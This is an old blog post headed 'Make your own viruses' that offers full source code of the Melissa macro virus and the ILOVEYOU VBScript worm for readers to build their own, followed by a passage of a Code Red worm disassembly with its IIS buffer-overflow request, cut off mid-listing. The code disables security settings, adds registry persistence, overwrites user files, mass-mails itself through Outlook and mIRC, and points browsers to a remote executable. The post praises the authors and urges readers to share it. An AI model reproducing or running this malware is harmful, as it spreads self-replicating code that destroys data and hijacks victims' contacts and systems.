Monday, February 12, 2007

MAKE YOUR OWN VIRUSES

FOR ALL THOSE OF YOU WHO ALWAYS WANTED TO MAKE THEIR OWN VIRUSES, TROJANS, WORMS, AND BUGS..HERE'S SOME SOURCE CODES FOR THE MOST POPULAR YET THE MOST LETHAL VIRUSES EVER KNOWN TO MICROSOFT..THEY RAN IN MILLIOSN OF DOLLARS IN LOSS OWING TO THESE GENUISES WHO MADE THESE MASTERPIECES..WATCH THIS SPACE FOR ME..AND OOH YEA..DONT FORGET TO SHARE THE WORD!!!!!!!

The Renegade!!

Melissa [open source hack]

// Melissa Virus Source Code

Private Sub Document_Open()
On Error Resume Next
If System.PrivateProfileString("",
"HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") <> ""
Then
CommandBars("Macro").Controls("Security...").Enabled = False
System.PrivateProfileString("",
"HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1&
Else
CommandBars("Tools").Controls("Macro").Enabled = False
Options.ConfirmConversions = (1 - 1): Options.VirusProtection = (1 - 1):
Options.SaveNormalPrompt = (1 - 1)
End If
Dim UngaDasOutlook, DasMapiName, BreakUmOffASlice
Set UngaDasOutlook = CreateObject("Outlook.Application")
Set DasMapiName = UngaDasOutlook.GetNameSpace("MAPI")
If System.PrivateProfileString("",
"HKEY_CURRENT_USER\Software\Microsoft\Office\", "Melissa?") <> "... by Kwyjibo"
Then
If UngaDasOutlook = "Outlook" Then
DasMapiName.Logon "profile", "password"
For y = 1 To DasMapiName.AddressLists.Count
Set AddyBook = DasMapiName.AddressLists(y)
x = 1
Set BreakUmOffASlice = UngaDasOutlook.CreateItem(0)
For oo = 1 To AddyBook.AddressEntries.Count
Peep = AddyBook.AddressEntries(x)
BreakUmOffASlice.Recipients.Add Peep
x = x + 1
If x > 50 Then oo = AddyBook.AddressEntries.Count
Next oo
BreakUmOffASlice.Subject = "Important Message From " &
Application.UserName
BreakUmOffASlice.Body = "Here is that document you asked for ... don't
show anyone else ;-)"
BreakUmOffASlice.Attachments.Add ActiveDocument.FullName
BreakUmOffASlice.Send
Peep = ""
Next y
DasMapiName.Logoff
End If
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\",
"Melissa?") = "... by Kwyjibo"
End If
Set ADI1 = ActiveDocument.VBProject.VBComponents.Item(1)
Set NTI1 = NormalTemplate.VBProject.VBComponents.Item(1)
NTCL = NTI1.CodeModule.CountOfLines
ADCL = ADI1.CodeModule.CountOfLines
BGN = 2
If ADI1.Name <> "Melissa" Then
If ADCL > 0 Then _
ADI1.CodeModule.DeleteLines 1, ADCL
Set ToInfect = ADI1
ADI1.Name = "Melissa"
DoAD = True
End If
If NTI1.Name <> "Melissa" Then
If NTCL > 0 Then _
NTI1.CodeModule.DeleteLines 1, NTCL
Set ToInfect = NTI1
NTI1.Name = "Melissa"
DoNT = True
End If
If DoNT <> True And DoAD <> True Then GoTo CYA
If DoNT = True Then
Do While ADI1.CodeModule.Lines(1, 1) = ""
ADI1.CodeModule.DeleteLines 1
Loop
ToInfect.CodeModule.AddFromString ("Private Sub Document_Close()")
Do While ADI1.CodeModule.Lines(BGN, 1) <> ""
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
BGN = BGN + 1
Loop
End If
If DoAD = True Then
Do While NTI1.CodeModule.Lines(1, 1) = ""
NTI1.CodeModule.DeleteLines 1
Loop
ToInfect.CodeModule.AddFromString ("Private Sub Document_Open()")
Do While NTI1.CodeModule.Lines(BGN, 1) <> ""
ToInfect.CodeModule.InsertLines BGN, NTI1.CodeModule.Lines(BGN, 1)
BGN = BGN + 1
Loop
End If
CYA:
If NTCL <> 0 And ADCL = 0 And (InStr(1, ActiveDocument.Name, "Document") =
False) Then
ActiveDocument.SaveAs FileName:=ActiveDocument.FullName
ElseIf (InStr(1, ActiveDocument.Name, "Document") <> False) Then
ActiveDocument.Saved = True: End If
'WORD/Melissa written by Kwyjibo
'Works in both Word 2000 and Word 97
'Worm? Macro Virus? Word 97 Virus? Word 2000 Virus? You Decide!
'Word -> Email | Word 97 <--> Word 2000 ... it's a new age!
If Day(Now) = Minute(Now) Then Selection.TypeText " Twenty-two points, plus
triple-word-score, plus fifty points for using all my letters. Game's over.
I'm outta here."
End Sub

i love you [trojan horse]

rem barok -loveletter(vbe)
rem by: spyder / ispyder@mail.com / @GRAMMERSoft Group / Manila,Philippines
On Error Resume Next
dim fso,dirsystem,dirwin,dirtemp,eq,ctr,file,vbscopy,dow
eq=""
ctr=0
Set fso = CreateObject("Scripting.FileSystemObject")
set file = fso.OpenTextFile(WScript.ScriptFullname,1)
vbscopy=file.ReadAll
main()

sub main()
On Error Resume Next
dim wscr,rr
set wscr=CreateObject("WScript.Shell")
rr=wscr.RegRead("HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting Host\Settings\Timeout")
if (rr>=1) then
wscr.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting Host\Settings\Timeout",0,"REG_DWORD"
end if
Set dirwin = fso.GetSpecialFolder(0)
Set dirsystem = fso.GetSpecialFolder(1)
Set dirtemp = fso.GetSpecialFolder(2)
Set c = fso.GetFile(WScript.ScriptFullName)
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
regruns()
html()
spreadtoemail()
listadriv()
end sub

sub regruns()
On Error Resume Next
Dim num,downread
regcreate
"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\MSKernel32",dirsystem&"\MSKernel32.vbs"
regcreate
"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices\Win32DLL",dirwin&"\Win32DLL.vbs"
downread=""
downread=regget("HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Download Directory")
if (downread="") then
downread="c:\"
end if
if (fileexist(dirsystem&"\WinFAT32.exe")=1) then
Randomize
num = Int((4 * Rnd) + 1)
if num = 1 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.skyinet.net/~young1s/HJKhjnwerhjkxcvytwertnMTFwetrdsfmhPnjw6587345gvsdf7679njbvYT/WIN-BUGSFIX.exe"
elseif num = 2 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.skyinet.net/~angelcat/skladjflfdjghKJnwetryDGFikjUIyqwerWe546786324hjk4jnHHGbvbmKLJKjhkqj4w/WIN-BUGSFIX.exe"
elseif num = 3 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.skyinet.net/~koichi/jf6TRjkcbGRpGqaq198vbFV5hfFEkbopBdQZnmPOhfgER67b3Vbvg/WIN-BUGSFIX.exe"
elseif num = 4 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.skyinet.net/~chu/sdgfhjksdfjklNBmnfgkKLHjkqwtuHJBhAFSDGjkhYUgqwerasdjhPhjasfdglkNBhbqwebmznxcbvnmadshfgqw237461234iuy7thjg/WIN-BUGSFIX .exe"
end if
end if
if (fileexist(downread&"\WIN-BUGSFIX.exe")=0) then regcreate "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\WIN-BUGSFIX",downread&"\WIN-BUGSFIX.exe"
regcreate "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\StartPage","about:blank"
end if
end sub

sub listadriv
On Error Resume Next
Dim d,dc,s
Set dc = fso.Drives
For Each d in dc
If d.DriveType = 2 or d.DriveType=3 Then
folderlist(d.path&"\")
end if
Next
listadriv = s
end sub

sub infectfiles(folderspec)
On Error Resume Next
dim f,f1,fc,ext,ap,mircfname,s,bname,mp3
set f = fso.GetFolder(folderspec)
set fc = f.Files
for each f1 in fc
ext=fso.GetExtensionName(f1.path)
ext=lcase(ext)
s=lcase(f1.name)
if (ext="vbs") or (ext="vbe") then
set ap=fso.OpenTextFile(f1.path,2,true)
ap.write vbscopy
ap.close
elseif(ext="js") or (ext="jse") or (ext="css") or (ext="wsh") or (ext="sct") or (ext="hta") then
set ap=fso.OpenTextFile(f1.path,2,true)
ap.write vbscopy
ap.close
bname=fso.GetBaseName(f1.path)
set cop=fso.GetFile(f1.path)
cop.copy(folderspec&"\"&bname&".vbs") fso.DeleteFile(f1.path)
elseif(ext="jpg") or (ext="jpeg") then
set ap=fso.OpenTextFile(f1.path,2,true)
ap.write vbscopy
ap.close
set cop=fso.GetFile(f1.path)
cop.copy(f1.path&".vbs")
fso.DeleteFile(f1.path)
elseif(ext="mp3") or (ext="mp2") then
set mp3=fso.CreateTextFile(f1.path&".vbs")
mp3.write vbscopy
mp3.close
set att=fso.GetFile(f1.path)
att.attributes=att.attributes+2
end if
if (eq<>folderspec) then
if (s="mirc32.exe") or (s="mlink32.exe") or (s="mirc.ini") or (s="script.ini") or (s="mirc.hlp") then
set scriptini=fso.CreateTextFile(folderspec&"\script.ini") scriptini.WriteLine "[script]"
scriptini.WriteLine ";mIRC Script"
scriptini.WriteLine "; Please dont edit this script... mIRC will corrupt, if mIRC will"
scriptini.WriteLine " corrupt... WINDOWS will affect and will not run correctly. thanks"
scriptini.WriteLine ";"
scriptini.WriteLine ";Khaled Mardam-Bey"
scriptini.WriteLine ";http://www.mirc.com"
scriptini.WriteLine ";"
scriptini.WriteLine "n0=on 1:JOIN:#:{"
scriptini.WriteLine "n1= /if ( $nick == $me ) { halt }" scriptini.WriteLine "n2= /.dcc send $nick"&dirsystem&"\LOVE-LETTER-FOR-YOU.HTM"
scriptini.WriteLine "n3=}"
scriptini.close
eq=folderspec
end if
end if
next
end sub

sub folderlist(folderspec)
On Error Resume Next
dim f,f1,sf
set f = fso.GetFolder(folderspec)
set sf = f.SubFolders
for each f1 in sf
infectfiles(f1.path)
folderlist(f1.path)
next
end sub

sub regcreate(regkey,regvalue)
Set regedit = CreateObject("WScript.Shell")
regedit.RegWrite regkey,regvalue
end sub

function regget(value)
Set regedit = CreateObject("WScript.Shell")
regget=regedit.RegRead(value)
end function

function fileexist(filespec)
On Error Resume Next
dim msg
if (fso.FileExists(filespec)) Then
msg = 0
else
msg = 1
end if
fileexist = msg
end function

function folderexist(folderspec)
On Error Resume Next
dim msg
if (fso.GetFolderExists(folderspec)) then
msg = 0
else
msg = 1
end if
fileexist = msg
end function

sub spreadtoemail()
On Error Resume Next
dim x,a,ctrlists,ctrentries,malead,b,regedit,regv,regad
set regedit=CreateObject("WScript.Shell")
set out=WScript.CreateObject("Outlook.Application")
set mapi=out.GetNameSpace("MAPI")
for ctrlists=1 to mapi.AddressLists.Count
set a=mapi.AddressLists(ctrlists)
x=1
regv=regedit.RegRead("HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a) if (regv="") then
regv=1
end if
if (int(a.AddressEntries.Count)>int(regv)) then
for ctrentries=1 to a.AddressEntries.Count
malead=a.AddressEntries(x)
regad=""
regad=regedit.RegRead("HKEY_CURRENT_USER\Software\Microsoft\WAB\"&malead) if (regad="")
then
set male=out.CreateItem(0)
male.Recipients.Add(malead)
male.Subject = "ILOVEYOU"
male.Body = vbcrlf&"kindly check the attached LOVELETTER coming from me."
male.Attachments.Add(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs") male.Send
regedit.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\WAB\"&malead,1,"REG_DWORD" end if
x=x+1
next
regedit.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a,a.AddressEntries.Count else
regedit.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a,a.AddressEntries.Count end if
next
Set out=Nothing
Set mapi=Nothing
end sub

sub html
On Error Resume Next
dim lines,n,dta1,dta2,dt1,dt2,dt3,dt4,l1,dt5,dt6
dta1="LOVELETTER - HTML<?-?TITLE><META<br /> NAME=@-@Generator@-@ CONTENT=@-@BAROK VBS - LOVELETTER@-@>"&vbcrlf& _ "<META<br /> NAME=@-@Author@-@ CONTENT=@-@spyder ?-? ispyder@mail.com ?-?<br /> @GRAMMERSoft Group ?-? Manila, Philippines ?-? March 2000@-@>"&vbcrlf& _ "<META<br /> NAME=@-@Description@-@ CONTENT=@-@simple but i think this is good...@-@>"&vbcrlf& _<br /> "<?-?HEAD><BODY<br /> ONMOUSEOUT=@-@window.name=#-#main#-#;window.open(#-#LOVE-LETTER-FOR-YOU.HTM#<br /> -#,#-#main#-#)@-@ "&vbcrlf& _<br /> "ONKEYDOWN=@-@window.name=#-#main#-#;window.open(#-#LOVE-LETTER-FOR-YOU.HTM#<br /> -#,#-#main#-#)@-@ BGPROPERTIES=@-@fixed@-@ BGCOLOR=@-@#FF9933@-@>"&vbcrlf& _<br /> "<CENTER><p>This HTML file need ActiveX Control<?-?p><p>To Enable to read this HTML file<BR>-<br /> Please press #-#YES#-# button to Enable ActiveX<?-?p>"&vbcrlf& _<br /> "<?-?CENTER><MARQUEE LOOP=@-@infinite@-@<br /> BGCOLOR=@-@yellow@-@>----------z--------------------z----------<?-?MARQUEE> "&vbcrlf& _<br /> "<?-?BODY><?-?HTML>"&vbcrlf& _<br /> "<SCRIPT language=@-@JScript@-@>"&vbcrlf& _ "<!--?-??-?"&vbcrlf& _<br /> "if (window.screen){var wi=screen.availWidth;var<br /> hi=screen.availHeight;window.moveTo(0,0);window.resizeTo(wi,hi);}"&vbcrlf& _ "?-??-?-->"&vbcrlf& _<br /> "<?-?SCRIPT>"&vbcrlf& _<br /> "<SCRIPT LANGUAGE=@-@VBScript@-@>"&vbcrlf& _ "<!--"&vbcrlf& _<br /> "on error resume next"&vbcrlf& _<br /> "dim fso,dirsystem,wri,code,code2,code3,code4,aw,regdit"&vbcrlf& _ "aw=1"&vbcrlf& _<br /> "code="<br /> dta2="set fso=CreateObject(@-@Scripting.FileSystemObject@-@)"&vbcrlf& _<br /> "set dirsystem=fso.GetSpecialFolder(1)"&vbcrlf& _<br /> "code2=replace(code,chr(91)&chr(45)&chr(91),chr(39))"&vbcrlf& _<br /> "code3=replace(code2,chr(93)&chr(45)&chr(93),chr(34))"&vbcrlf& _<br /> "code4=replace(code3,chr(37)&chr(45)&chr(37),chr(92))"&vbcrlf& _ "set<br /> wri=fso.CreateTextFile(dirsystem&@-@^-^MSKernel32.vbs@-@)"&vbcrlf& _ "wri.write code4"&vbcrlf&<br /> _<br /> "wri.close"&vbcrlf& _<br /> "if (fso.FileExists(dirsystem&@-@^-^MSKernel32.vbs@-@)) then"&vbcrlf& _ "if (err.number=424)<br /> then"&vbcrlf& _<br /> "aw=0"&vbcrlf& _<br /> "end if"&vbcrlf& _<br /> "if (aw=1) then"&vbcrlf& _<br /> "document.write @-@ERROR: can#-#t initialize ActiveX@-@"&vbcrlf& _ "window.close"&vbcrlf& _<br /> "end if"&vbcrlf& _<br /> "end if"&vbcrlf& _<br /> "Set regedit = CreateObject(@-@WScript.Shell@-@)"&vbcrlf& _<br /> "regedit.RegWrite<br /> @-@HKEY_LOCAL_MACHINE^-^Software^-^Microsoft^-^Windows^-^CurrentVersion^-^Run^-^MSKernel32@-@,dirsystem&@-@^-^MSKernel32.vbs@-@"&vbcrlf& _ "?-??-?-->"&vbcrlf& _<br /> "<?-?SCRIPT>"<br /> dt1=replace(dta1,chr(35)&chr(45)&chr(35),"'")<br /> dt1=replace(dt1,chr(64)&chr(45)&chr(64),"""") dt4=replace(dt1,chr(63)&chr(45)&chr(63),"/")<br /> dt5=replace(dt4,chr(94)&chr(45)&chr(94),"\")<br /> dt2=replace(dta2,chr(35)&chr(45)&chr(35),"'")<br /> dt2=replace(dt2,chr(64)&chr(45)&chr(64),"""") dt3=replace(dt2,chr(63)&chr(45)&chr(63),"/")<br /> dt6=replace(dt3,chr(94)&chr(45)&chr(94),"\")<br /> set fso=CreateObject("Scripting.FileSystemObject")<br /> set c=fso.OpenTextFile(WScript.ScriptFullName,1)<br /> lines=Split(c.ReadAll,vbcrlf)<br /> l1=ubound(lines)<br /> for n=0 to ubound(lines)<br /> lines(n)=replace(lines(n),"'",chr(91)+chr(45)+chr(91))<br /> lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))<br /> lines(n)=replace(lines(n),"\",chr(37)+chr(45)+chr(37)) if (l1=n) then<br /> lines(n)=chr(34)+lines(n)+chr(34)<br /> else<br /> lines(n)=chr(34)+lines(n)+chr(34)&"&vbcrlf& _" end if<br /> next<br /> set b=fso.CreateTextFile(dirsystem+"\LOVE-LETTER-FOR-YOU.HTM") b.close<br /> set d=fso.OpenTextFile(dirsystem+"\LOVE-LETTER-FOR-YOU.HTM",2) d.write dt5<br /> d.write join(lines,vbcrlf)<br /> d.write vbcrlf<br /> d.write dt6<br /> d.close<br /> end sub <div style='clear: both;'></div> </div> <div class='post-footer'> <div class='post-footer-line post-footer-line-1'> <span class='post-author vcard'> Posted by <span class='fn' itemprop='author' itemscope='itemscope' itemtype='http://schema.org/Person'> <meta content='https://www.blogger.com/profile/12362144024735750062' itemprop='url'/> <a class='g-profile' href='https://www.blogger.com/profile/12362144024735750062' rel='author' title='author profile'> <span itemprop='name'>Atul Haldankar</span> </a> </span> </span> <span class='post-timestamp'> at <meta content='http://indianrenegade.blogspot.com/2007/02/i-love-you-trojan-horse.html' itemprop='url'/> <a class='timestamp-link' href='https://indianrenegade.blogspot.com/2007/02/i-love-you-trojan-horse.html' rel='bookmark' title='permanent link'><abbr class='published' itemprop='datePublished' title='2007-02-12T22:34:00-08:00'>10:34 PM</abbr></a> </span> <span class='post-comment-link'> <a class='comment-link' href='https://www.blogger.com/comment/fullpage/post/4876224678523224717/8406512142621162571' onclick=''> No comments: </a> </span> <span class='post-icons'> <span class='item-action'> <a href='https://www.blogger.com/email-post.g?blogID=4876224678523224717&postID=8406512142621162571' title='Email Post'> <img alt='' class='icon-action' height='13' src='https://resources.blogblog.com/img/icon18_email.gif' width='18'/> </a> </span> <span class='item-control blog-admin pid-1497295368'> <a href='https://www.blogger.com/post-edit.g?blogID=4876224678523224717&postID=8406512142621162571&from=pencil' title='Edit Post'> <img alt='' class='icon-action' height='18' src='https://resources.blogblog.com/img/icon18_edit_allbkg.gif' width='18'/> </a> </span> </span> <div class='post-share-buttons goog-inline-block'> </div> </div> <div class='post-footer-line post-footer-line-2'> <span class='post-labels'> </span> </div> <div class='post-footer-line post-footer-line-3'> <span class='post-location'> </span> </div> </div> </div> </div> <div class='post-outer'> <div class='post hentry uncustomized-post-template' itemprop='blogPost' itemscope='itemscope' itemtype='http://schema.org/BlogPosting'> <meta content='4876224678523224717' itemprop='blogId'/> <meta content='3125524134221774572' itemprop='postId'/> <a name='3125524134221774572'></a> <h3 class='post-title entry-title' itemprop='name'> <a href='https://indianrenegade.blogspot.com/2007/02/code-red-worm-source-code.html'>Code-Red-Worm [source code]</a> </h3> <div class='post-header'> <div class='post-header-line-1'></div> </div> <div class='post-body entry-content' id='post-body-3125524134221774572' itemprop='description articleBody'> seg000:00000000 seg000 segment byte public 'CODE' use32<br />seg000:00000000 assume cs:seg000<br />seg000:00000000 assume es:nothing, ss:nothing, ds:nothing, fs:nothing, gs:nothing<br />seg000:00000000 47 45 54 20 2F 64+aGetDefault_ida db 'GET /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN'<br />seg000:00000000 65 66 61 75 6C 74+ db 'NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN'<br />seg000:00000000 2E 69 64 61 3F 4E+ db 'NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN'<br />seg000:00000000 4E 4E 4E 4E 4E 4E+ db 'NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN'<br />seg000:00000000 4E 4E 4E 4E 4E 4E+ db 'N%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u685'<br />seg000:00000000 4E 4E 4E 4E 4E 4E+ db '8%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53f'<br />seg000:00000000 4E 4E 4E 4E 4E 4E+ db 'f%u0078%u0000%u00=a HTTP/1.0',0Dh,0Ah<br />seg000:00000000 4E 4E 4E 4E 4E 4E+ db 'Content-type: text/xml',0Ah<br />seg000:00000000 4E 4E 4E 4E 4E 4E+ db 'HOST:www.worm.com',0Ah<br />seg000:00000000 4E 4E 4E 4E 4E 4E+ db ' Accept: */*',0Ah<br />seg000:00000000 4E 4E 4E 4E 4E 4E+ db 'Content-length: 3569 ',0Dh,0Ah<br />seg000:00000000 4E 4E 4E 4E 4E 4E+ db 0Dh,0Ah<br />seg000:000001D6<br />seg000:000001D6 ; ۛۛۛۛۛۛۛ۠S U B R O U T I N E ۛۛۛۛۛۛۛۛۛۛۛۛۛۛۛۛۛۛۛۍ<br />seg000:000001D6<br />seg000:000001D6 ; this is the worm body. this is the code that actually does the work<br />seg000:000001D6 ; Attributes: bp-based frame<br />seg000:000001D6<br />seg000:000001D6 WORM proc near<br />seg000:000001D6<br />seg000:000001D6 var_218 = byte ptr -218h<br />seg000:000001D6 var_190 = dword ptr -190h<br />seg000:000001D6<br />seg000:000001D6 55 push ebp<br />seg000:000001D7 8B EC mov ebp, esp ; switch esp to ebp<br />seg000:000001D9 81 EC 18 02 00 00 sub esp, 218h ; set up space for local variables<br />seg000:000001DF 53 push ebx ; save a few regs<br />seg000:000001E0 56 push esi<br />seg000:000001E1 57 push edi<br />seg000:000001E2 8D BD E8 FD FF FF lea edi, [ebp+var_218] ; fill in stack vars with 0xcc<br />seg000:000001E8 B9 86 00 00 00 mov ecx, 86h ; '?'<br />seg000:000001ED B8 CC CC CC CC mov eax, 0CCCCCCCCh<br />seg000:000001F2 F3 AB repe stosd ; Store String<br />seg000:000001F4 C7 85 70 FE FF FF+ mov [ebp+var_190], 0 ; set 190h to 0<br />seg000:000001F4 00 00 00 00 ; this zeros out the memory that holds the GetProcAddress Call.<br />seg000:000001FE E9 0A 0B 00 00 jmp WORMCONTINUE ; Jump<br />seg000:000001FE WORM endp<br />seg000:000001FE<br />seg000:00000203<br />seg000:00000203 ; ۛۛۛۛۛۛۛ۠S U B R O U T I N E ۛۛۛۛۛۛۛۛۛۛۛۛۛۛۛۛۛۛۛۍ<br />seg000:00000203<br />seg000:00000203<br />seg000:00000203 DataSetup proc near ; CODE XREF: seg000:00000D0Dp<br />seg000:00000203 8F 85 68 FE FF FF pop dword ptr [ebp-198h]<br />seg000:00000209 8D BD F0 FE FF FF lea edi, [ebp-110h] ; set ebp -198h to address of the data segment<br />seg000:00000209 ; set edi to ebp -110<br />seg000:0000020F 64 A1 00 00 00 00 mov eax, large fs:0 ; set eax to an ebp+val<br />seg000:00000215 89 47 08 mov [edi+8], eax ; set ebp+118 to 0<br />seg000:00000218 64 89 3D 00 00 00+ mov large fs:0, edi ; set fs reg ?<br />seg000:0000021F E9 6F 0A 00 00 jmp JUMP_TABLE1 ; Jump<br />seg000:0000021F DataSetup endp<br />seg000:0000021F<br />seg000:00000224<br />seg000:00000224 ; ۛۛۛۛۛۛۛ۠S U B R O U T I N E ۛۛۛۛۛۛۛۛۛۛۛۛۛۛۛۛۛۛۛۍ<br />seg000:00000224<br />seg000:00000224<br />seg000:00000224 DO_RVA proc near ; CODE XREF: seg000:00000C93p<br />seg000:00000224 8F 85 60 FE FF FF pop dword ptr [ebp-1A0h]<br />seg000:0000022A C7 85 F0 FE FF FF+ mov dword ptr [ebp-110h], 0FFFFFFFFh ; set 110h to 0xffffffff<br />seg000:00000234 8B 85 68 FE FF FF mov eax, [ebp-198h] ; load eax to the data address<br />seg000:0000023A 83 E8 07 sub eax, 7 ; sub 7 from the data segment, putting you at: oD0B<br />seg000:0000023D 89 85 F4 FE FF FF mov [ebp-10Ch], eax ; set ebp - 10c to oD0B<br />seg000:00000243 C7 85 58 FE FF FF+ mov dword ptr [ebp-1A8h], 77E00000h ; set 1a8 to 0x780000<br />seg000:00000243 00 00 E0 77 ; __NULL_IMPORT_DESCRIPTOR+15D4h<br />seg000:0000024D E8 9B 0A 00 00 call DO_REWRITE ; jump into ced, do stuff, then jump back<br />seg000:00000252<br />seg000:00000252 RVA_TOP: ; CODE XREF: DO_RVA+213j<br />seg000:00000252 83 BD 70 FE FF FF+ cmp dword ptr [ebp-190h], 0 ; this is null on the first loop through, due to a null set at init.<br />seg000:00000252 00 ; The purpose of this loop point is to loop through DLL Names in the RVA table, looking for KERNEL32.dll, or more specificly, KERN<br />seg000:00000259 0F 85 DD 01 00 00 jnz GETPROC_LOADED ; go here after GetProcAddr Is loaded<br />seg000:0000025F 8B 8D 58 FE FF FF mov ecx, [ebp-1A8h] ; set ecx to 77E00000<br />seg000:00000265 81 C1 00 00 01 00 add ecx, 10000h ; make ecx 0x77e10000<br />seg000:0000026B 89 8D 58 FE FF FF mov [ebp-1A8h], ecx<br />seg000:00000271 81 BD 58 FE FF FF+ cmp dword ptr [ebp-1A8h], 78000000h ; is it msvcrt?<br />seg000:0000027B 75 0A jnz short NOT_MSVCRT ; if it is not, then jump here<br />seg000:0000027D C7 85 58 FE FF FF+ mov dword ptr [ebp-1A8h], 0BFF00000h<br />seg000:00000287<br />seg000:00000287 NOT_MSVCRT: ; CODE XREF: DO_RVA+57j<br />seg000:00000287 8B 95 58 FE FF FF mov edx, [ebp-1A8h] ; set edx to 0x77E10000<br />seg000:0000028D 33 C0 xor eax, eax ; null out eax<br />seg000:0000028F 66 8B 02 mov ax, [edx] ; move the low half of *edx into eax<br />seg000:0000028F ; should be something like 5a4d<br />seg000:00000292 3D 4D 5A 00 00 cmp eax, 5A4Dh ; Compare Two Operands<br />seg000:00000297 0F 85 9A 01 00 00 jnz TO_RVA_TOP ; jump if eax is not 5a4d<br />seg000:0000029D 8B 8D 58 FE FF FF mov ecx, [ebp-1A8h] ; set ecx to 0x77E10000<br />seg000:000002A3 8B 51 3C mov edx, [ecx+3Ch] ; set edx to *ecx+3ch<br />seg000:000002A3 ; should be something like 0x000000D8<br />seg000:000002A6 8B 85 58 FE FF FF mov eax, [ebp-1A8h] ; set eax to 0x77E10000<br />seg000:000002AC 33 C9 xor ecx, ecx ; null out ecx<br />seg000:000002AE 66 8B 0C 10 mov cx, [eax+edx] ; set ecx to what is at eax+edx<br />seg000:000002AE ; should be something like 0x00004550<br />seg000:000002B2 81 F9 50 45 00 00 cmp ecx, 4550h ; Compare Two Operands<br />seg000:000002B8 0F 85 79 01 00 00 jnz TO_RVA_TOP ; jump if ecx is not 0x00004550<br />seg000:000002BE 8B 95 58 FE FF FF mov edx, [ebp-1A8h] ; set edx to 0x77E10000<br />seg000:000002C4 8B 42 3C mov eax, [edx+3Ch] ; set eax to what's at 0x77E1003Ch<br />seg000:000002C4 ; should be something like 0x000000D8<br />seg000:000002C7 8B 8D 58 FE FF FF mov ecx, [ebp-1A8h] ; set ecx to 0x77E10000<br />seg000:000002CD 8B 54 01 78 mov edx, [ecx+eax+78h] ; set edx to what's at address 0x77E100B4<br />seg000:000002CD ; should be somehing like 51E00<br />seg000:000002D1 03 95 58 FE FF FF add edx, [ebp-1A8h] ; add 0x77E10000 to edx<br />seg000:000002D7 89 95 54 FE FF FF mov [ebp-1ACh], edx ; set ebp-1AC to 0x77E61E00<br />seg000:000002DD 8B 85 54 FE FF FF mov eax, [ebp-1ACh] ; set eax to 0x77E61E00<br />seg000:000002E3 8B 48 0C mov ecx, [eax+0Ch] ; set ecx to what is at 0x77E61E0C<br />seg000:000002E3 ; should be something like 0x005394E<br />seg000:000002E6 03 8D 58 FE FF FF add ecx, [ebp-1A8h] ; add 0x77E10000 to ecx, to get something like 0x77E6394e<br />seg000:000002EC 89 8D 4C FE FF FF mov [ebp-1B4h], ecx ; set ebp-1B4 to 77E6394E<br />seg000:000002F2 8B 95 4C FE FF FF mov edx, [ebp-1B4h] ; set edx to 77E6394E<br />seg000:000002F8 81 3A 4B 45 52 4E cmp dword ptr [edx], 4E52454Bh ; looking for our specific code (NREK) - KERN spelled backwards.. this is to find KERNEL32<br />seg000:000002FE 0F 85 33 01 00 00 jnz TO_RVA_TOP ; Jump if Not Zero (ZF=0)<br />seg000:00000304 8B 85 4C FE FF FF mov eax, [ebp-1B4h]<br />seg000:0000030A 81 78 04 45 4C 33+ cmp dword ptr [eax+4], 32334C45h ; looking for our specific code (23LE) - EL32 spelled backwards.. this is to find KERNEL32<br />seg000:00000311 0F 85 20 01 00 00 jnz TO_RVA_TOP ; Jump if Not Zero (ZF=0)<br />seg000:00000317 8B 8D 58 FE FF FF mov ecx, [ebp-1A8h] ; ok, we have kernel32, now get the functions we need.<br />seg000:0000031D 89 8D 34 FE FF FF mov [ebp-1CCh], ecx ; store the kernel32 base addr.<br />seg000:00000323 8B 95 54 FE FF FF mov edx, [ebp-1ACh] ; set edx to the offset from the base<br />seg000:00000329 8B 85 58 FE FF FF mov eax, [ebp-1A8h] ; set eax to the base<br />seg000:0000032F 03 42 20 add eax, [edx+20h] ; add the offset pointer to the base to get the RVA addr.<br />seg000:00000332 89 85 4C FE FF FF mov [ebp-1B4h], eax ; set ebp-1b4 with rva holder<br />seg000:00000338 C7 85 48 FE FF FF+ mov dword ptr [ebp-1B8h], 0 ; set ebp-1b8 to 0<br />seg000:00000342 EB 1E jmp short RVA_PROCESS_FUNC ; This is the part of the inner RVA loop that compares the current RVA function to GetProcAddr.<br />seg000:00000342 ;<br />seg000:00000344 ; ĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄĄč<br 